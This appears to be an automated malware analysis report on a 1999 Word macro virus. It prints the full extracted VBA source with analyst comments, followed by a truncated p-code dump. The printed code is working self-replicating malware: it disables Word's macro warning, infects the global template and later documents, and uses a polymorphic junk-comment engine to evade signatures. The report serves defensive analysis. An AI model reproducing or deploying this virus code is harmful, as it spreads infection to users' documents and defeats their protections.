Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1dd69ef0297ab33a…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-06-24 20:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: beaff49efa09ec532bf8487488924bfb SHA-1: ff499cb1e7666f23608056843d612d99f0855524 SHA-256: 1dd69ef0297ab33aab46375a9cc77c4c6b744ea830a9136288c82fca61d18179
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Liar-3'. It contains a single VBA module (ThisDocument) with a 'Document_Open' macro, so the code runs automatically when the document is opened. The carved source (below) is a self-replicating Word 97 macro virus rather than a downloader: it first sets Options.VirusProtection = False to suppress Word's macro warning, then copies its own module through the VBA project object model (VBProject.VBComponents(1).CodeModule) into the global template (NormalTemplate) as a Document_Close macro, or — when it is already running from the global template — back into the active document as Document_Open, and saves the target. Each copy is rebuilt line by line with fresh random high-byte junk in trailing comments (the self-described 'bliem' polymorphic engine), so the macro's bytes differ on every infection and exact-match signatures on the macro text are defeated; apart from that padding the code is plain, readable VBA, not obfuscated. No URL, network call, shell execution or dropped file appears anywhere in the extracted code, so this sample gives no evidence of downloading further payloads. Replication depends on programmatic access to VBProject, which current Office builds block by default ("Trust access to the VBA project object model"), consistent with the 1999 Word 8.0 authoring metadata; on any host that opened the file with macros enabled, the global template (Normal.dot) should be checked for an injected Document_Close macro.

Heuristics 3

  • ClamAV: Doc.Trojan.Liar-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Liar-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6758 bytes
SHA-256: 5bf7bac0f6b0a0ff239e62c6f473ad6d7824030aec809ab23a2ce0f23d044de7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst] Lines marked "[analyst]" were added during review; they are not part of the sample.
' [analyst] Auto-executing entry point: Word runs Document_Open when the file is opened (heuristic OLE_VBA_DOCOPEN).
' [analyst] Every statement line in this routine ends with a bare apostrophe. That trailing comment marker is
' [analyst] functional, not decoration: the "For i = 2 To lin" loop below reads this module's own lines, keeps the
' [analyst] text before the first apostrophe and appends freshly generated junk, so the apostrophe is the hook the
' [analyst] polymorphic copy is built around.
Sub document_open() '
' [analyst] v(1) is a signature string that is never read again. Options.VirusProtection = False turns off Word's
' [analyst] macro virus protection setting, removing the warning that would otherwise be shown when documents with
' [analyst] macros are opened (this is a Word option, so it presumably stays off for later sessions — verify on a
' [analyst] Word 97/2000 VM).
Dim v(150): v(1) = "bliem by j2f": Options.VirusProtection = False '
' [analyst] MacroContainer is the document or template hosting this running macro. "a" is its VBA project and "ab"
' [analyst] its first component; this sample has only one module (stream Macros/VBA/ThisDocument), so "ab" is the
' [analyst] module containing this code. NOTE(review): on Office 2003+ this VBProject access fails unless
' [analyst] "Trust access to the VBA project object model" is enabled, which stops replication.
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
' [analyst] abc = code module of this module (line-level read access used below); s = NormalTemplate, the default
' [analyst] infection target (Word's global template); t = Chr(39) = the apostrophe.
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
' [analyst] nh = code module of the first component in the target's VBA project — where the copy will be written.
Set nh = s.VBProject.VBComponents(1).CodeModule '
' [analyst] vx = junk comment for the copy's header line: Int(75 - Rnd*20) gives 55..75 characters, each
' [analyst] Chr(255 - Int(Rnd*100)) i.e. character codes 156..255. Rnd is used here before Randomize is called
' [analyst] below, so this first junk string is presumably drawn from the unseeded generator.
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
' [analyst] Default copy header: when infecting the global template the routine is renamed document_close, so it
' [analyst] fires on Word's Document_Close event for documents closed afterwards.
vc = "Sub document_close()" & t & vx & vbCr '
' [analyst] Already running from the global template (i.e. this is the document_close copy): flip direction —
' [analyst] target the active document and name the copy document_open again (the form seen in this sample).
' [analyst] Cycle: infected document -> Normal template (as Document_Close) -> later documents (as Document_Open).
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument '
Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Sub document_open()" & t & vx & vbCr '
' [analyst] Seed the RNG, then lin = number of lines in this module (the source to be copied).
End If: Randomize: lin = abc.countoflines '
' [analyst] Rebuild the module line by line, starting at 2 because the Sub header was regenerated above.
For i = 2 To lin '
jc = "" '
' [analyst] d is 0, 1 or 2; it only matters when it equals 2 (extra pad line, see below).
d = Int(Rnd * 3) '
' [analyst] p = position of the first apostrophe on the current line.
p = InStr(abc.Lines(i, 1), t) '
' [analyst] No apostrophe: GoTo e_ jumps past Next i, so copying stops at the first such line.
If p = 0 Then GoTo e_ '
' [analyst] p = 2 matches the " 'junk" pad lines emitted further down (space then apostrophe). Once the module
' [analyst] exceeds 100 lines those pad lines are dropped from the copy, bounding growth across generations.
If p = 2 And lin > 100 Then '
v(i) = "": d = 1: GoTo n_ '
End If '
' [analyst] Keep the code before the apostrophe and replace everything after it with new junk (55..75 characters,
' [analyst] codes 156..255), so each generation differs byte-for-byte while the executable part is unchanged.
v(i) = Left(abc.Lines(i, 1), (p - 1)) '
For j = 1 To Int(75 - (Rnd * 20))  '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
' [analyst] With d = 2, also insert a comment-only pad line " 'junk" after the rebuilt line.
If d = 2 Then v(i) = v(i) & vbCr & Chr(32) & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
' [analyst] Only write into a target whose module is empty (fewer than 2 lines), i.e. not already infected.
' [analyst] AddFromString injects the regenerated routine; s.Save writes the target to disk — for NormalTemplate
' [analyst] this persists the infection in Normal.dot across Word sessions. No network, shell or file-drop activity
' [analyst] is present anywhere in this routine.
If nh.countoflines < 2 Then '
nh.AddFromString vc '
s.Save '
End If '
End Sub '
Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by Jack Twoflower '

' Processing file: /opt/analyzer/scan_staging/b670258e33f8450dad57214c5b90a929.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8828 bytes
' Line #0:
' 	FuncDefn (Sub document_open())
' 	QuoteRem 0x0014 0x0000 ""
' Line #1:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x0096 
' 	VarDefn v
' 	BoS 0x0000 
' 	LitStr 0x000C "bliem by j2f"
' 	LitDI2 0x0001 
' 	ArgsSt v 0x0001 
' 	BoS 0x0000 
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' 	QuoteRem 0x0043 0x0000 ""
' Line #2:
' 	SetStmt 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	Set a 
' 	BoS 0x0000 
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld a 
' 	ArgsMemLd VBComponents 0x0001 
' 	Set ab 
' 	QuoteRem 0x003D 0x0000 ""
' Line #3:
' 	SetStmt 
' 	Ld ab 
' 	MemLd CodeModule 
' 	Set abc 
' 	BoS 0x0000 
' 	SetStmt 
' 	Ld NormalTemplate 
' 	Set s 
' 	BoS 0x0000 
' 	LitDI2 0x0027 
' 	ArgsLd Chr 0x0001 
' 	St t 
' 	QuoteRem 0x003D 0x0000 ""
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #5:
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x004B 
' 	Ld Rnd 
' 	LitDI2 0x0014 
' 	Mul 
' 	Paren 
' 	Sub 
' 	FnInt 
' 	For 
' 	BoS 0x0000 
' 	Ld vx 
' 	LitDI2 0x00FF 
' 	Ld Rnd 
' 	LitDI2 0x0064 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St vx 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld y 
' 	EndForVariable 
' 	NextVar 
' 	QuoteRem 0x004F 0x0000 ""
' Line #6:
' 	LitStr 0x0014 "Sub document_close()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x002C 0x0000 ""
' Line #7:
' 	Ld MacroContainer 
' 	Ld NormalTemplate 
' 	Eq 
' 	IfBlock 
' 	QuoteRem 0x0028 0x0000 ""
' Line #8:
' 	SetStmt 
' 	Ld ActiveDocument 
' 	Set s 
' 	QuoteRem 0x0017 0x0000 ""
' Line #9:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld s 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nh 
' 	QuoteRem 0x0030 0x0000 ""
' Line #10:
' 	LitStr 0x0013 "Sub document_open()"
' 	Ld t 
' 	Concat 
' 	Ld vx 
' 	Concat 
' 	Ld vbCr 
' 	Concat 
' 	St vc 
' 	QuoteRem 0x002B 0x0000 ""
' Line #11:
' 	EndIfBlock 
' 	BoS 0x0000 
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	Ld abc 
' 	MemLd countoflines 
' 	St lin 
' 	QuoteRem 0x002A 0x0000 ""
' Line #12:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0002 
' 	Ld lin 
' 	For 
' 	QuoteRem 0x0011 0x0000 ""
' Line #13:
' 	LitStr 0x0000 ""
' 	St jc 
' 	QuoteRem 0x0008 0x0000 ""
' Line #14:
' 	Ld Rnd 
' 	L
... (truncated)